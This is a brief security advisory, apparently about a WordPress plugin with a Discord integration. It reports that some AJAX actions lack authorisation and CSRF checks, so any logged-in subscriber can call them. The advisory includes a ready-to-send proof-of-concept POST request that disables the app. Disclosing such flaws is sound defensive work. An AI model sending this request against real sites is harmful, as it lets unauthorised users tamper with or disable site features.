The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) in some of its AJAX actions, allowing any logged in users, such as subscriber to call them, and disable the app for example.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=mo_discord_disable_app&app_name=test